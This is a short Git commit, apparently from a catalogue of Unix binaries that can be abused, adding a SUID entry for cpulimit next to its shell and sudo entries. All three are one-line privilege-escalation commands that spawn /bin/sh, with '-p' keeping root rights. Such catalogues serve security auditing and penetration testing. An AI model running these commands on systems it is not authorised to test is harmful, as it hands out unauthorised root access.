Add cpulimit SUID

This commit is contained in:
AssassinUKG
2021-02-27 11:06:40 +00:00
committed by GitHub
parent eca7899007
commit c20963cfd6

View File

@@ -2,6 +2,8 @@
functions:
shell:
- code: cpulimit -l 100 -f /bin/sh
suid:
- code: ./cpulimit -l 100 -f -- /bin/sh -p
sudo:
- code: sudo cpulimit -l 100 -f /bin/sh
---